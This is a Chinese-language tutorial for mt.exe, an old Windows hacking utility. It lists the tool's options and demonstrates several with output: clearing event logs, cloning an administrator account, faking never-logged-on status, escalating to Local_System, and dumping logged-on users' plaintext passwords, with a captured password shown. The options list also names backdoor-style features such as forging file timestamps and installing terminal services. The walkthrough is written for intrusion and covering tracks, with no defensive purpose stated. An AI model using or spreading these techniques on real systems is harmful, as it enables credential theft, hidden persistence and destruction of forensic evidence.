MT的使用

MT的使用

用法: mt.exe <选项>   选项 :   -filter ---更改 TCP/IP 过滤器的开头状态   -addport ---添加端口到过滤器的允许列表   -setport ---设置端口作为过滤器的允许列表   -nicinfo ---列出 TCP/IP 界面信息   -pslist ---列出活动进程   -pskill ---杀毒指定进程   -dlllist ---列出指定进程的 DLL   -sysinfo ---列出系统信息   -shutdown ---关闭系统   -reboot ---重启系统   -poweroff ---关闭电源   -logoff ---注销当前用户会话   -chkts ---检查终端服务信息   -setupts ---安装终端服务   -remts ---卸载终端服务   -chgtsp ---重置终端服务端口   -clog ---清除系统日志   -enumsrv ---列出所有服务   -querysrv ---列出指定服务的详细信息   -instsrv ---安装一个服务   -cfgsrv ---更改服务配置   -remsrv ---卸载指定服务   -startsrv ---启动指定服务   -stopsrv ---停止指定服务   -netget ---从 http/ftp 下载   -redirect ---端口重定向   -chkuser ---列出所有账户、sid 和 anti 克隆   -clone ---克隆 admin 到目标   -never ---设置账户看上去从未登录   -killuser ---删除账户，甚至是 "guest" 也可删除   -su ---以 Local_System 权限运行进程   -findpass ---显示所有已登录用户的口令   -netstat ---列出 TCP 连接   -killtcp ---杀死 TCP 连接   -psport ---映射端口到进程   -touch ---设置文件日期和时间到指定值   -secdel ---安全擦除文件或目录占用的空间   -regshell ---进入一个控制台注册表编辑器   -chkdll ---检测 gina dll 后门  一MT.EXE –filter   Usage:   MT -filter <ON|OFF> ----Enabld|Disable TCP/IP Filter.   这个是打开关闭TCP/IP筛选的 二MT.EXE-pslist  列出系统活动进程 三MT.EXE -pskill   Usage:   mt -pskill <PID|ProcessName>  杀进程 我们使用MyIE.exe这个软件作为测试,看看他们能不能杀死这个进程,输入MT –PSLIST,我们知道MyIE.exe的PID值是924,于是输入:mt.exe -pskill 924  四mt.exe -dlllist   Usage:   mt -dlllist <PID|ProcessName>   列出进程中相关的DLL文件 五 mt.exe –sysinfo   列出系统信息 六mt.exe -shutdown ---Shutdown system.   -reboot ---Reboot system.   -poweroff ---Turn off power.   -logoff ---Logoff current user’s session.   这4个命令就不说了,和系统工具shutdown不一样的是,输入之后没有任何的提示,直接关机 七 mt.exe -chkts ---Check Terminal Service info.   -setupts ---Install Terminal Service.    安装终端服务 -remts ---Remove Terminal Service.       卸载终端服务 -chgtsp ---Reset Terminal Service port.  重新设置终端端口号 这4个命令是和Terminal相关的 八mt.exe -clog用来清除记录,我们输入:   Usage:   mt -clog <app|sec|sys|all> ---Clean Application|Security|System|All logs.   从上面的可以看出,我们可以清除 "应用程序" "安全性" "系统"3个日志 九mt.exe-enumsrv    列出所有的服务 十mt.exe -clone   Usage:   mt -clone <SourUser> <DestUser>   克隆账号 新建一个用户yun,现在我要将管理员账号lin克隆为账号yun,输入:   D:/hack>mt -clone lin yun   Fail to Open SAM Key, 操作成功完成。   mt.exe -clone lin yun   Fail to Open SAM Key, 操作成功完成。   可能是不支持XP系统,虽然提示说操作成功,可是事实上,使用yun登陆的时候,还是没有成功,可能也是有其缺陷或者是我自己操作失败吧.  十一D:/>mt -never   -never ---Set account looks like never logged on.   它可以设置使用户看起来从来没有登陆过,在我的系统里面有2个用户,一个是管理员lin,另外一个是公用的帐户316,现在我把316设置为从不登陆的状态.输入   D:/>mt -never 316   Require System Privilege.提示没有权限,于是   D:/>mt -su   打开新的CMD窗口,输入   Microsoft Windows XP [版本 5.1.2600]   (C) 版权所有 1985-2001 Microsoft Corp.   C:/WINDOWS/system32>d:   D:/>mt -never 316   Fail to Set F Value.   D:/>net user 316   用户名 316   全名 316   注释   用户的注释   国家(地区)代码 000 (系统默认值)   帐户启用 Yes   帐户到期 从不   上次设置密码 2004/5/19 下午 08:22   密码到期 从不   密码可更改 2004/5/19 下午 08:22   需要密码 Yes   用户可以更改密码 Yes   允许的工作站 All   登录脚本   用户配置文件   主目录   上次登录 从不   可允许的登录小时数 All   本地组成员 *Users   全局组成员 *None   命令成功完成。   D:/>   可以看出来已经修改成功了,虽然显示的是Fail to Set F Value.,但还是成功了.这个功能和never.exe是一样的，只是将特定的的帐户上回登陆时间改为帐户从来没有登陆上过系统.   成功条件:你要有local system权限  十二 -su ---Run process as Local_System privilege.   以系统特权运行进程,在管理员登陆的情况下输入MT –su,马上弹出另外一CMD窗口,在这个窗口中,可以做任何我们想做的事情,这个也是系统的最高权限了.   20 -regshell ---Enter a console registry editor.   以CMD的方式编辑注册表,输入在CMD下不是很方便,不过有时候也是很使用的,输入:   D:/>mt -regshell   HKLM/>dir   <SubKey> HARDWARE   <SubKey> SAM   <SubKey> SECURITY   <SubKey> SOFTWARE   <SubKey> SYSTEM   Total: 5 SubKey, 0 Value.   HKLM/>quitreg   D:/>   和真实环境没有什么区别.  十三 mt.exe -psport ---Map ports to processes.   显示进程的端口 十四 mt.exe -findpass ---Show all logged on user’s pass.   得到所有登陆用户的密码,由于这个命令是For NT/2K only.,所以我在客户机上面测试这个功能,输入,很容易就得到了密码:   G:/WINNT/system32>mt -findpass   mt -findpass   The logon information :   Domain : 316-2AS8L1B1FL5   Username : Administrator   Password : winyaj   G:/WINNT/system32>   这个比findpass.exe还方便一些,不需要知道用户进程的PID值.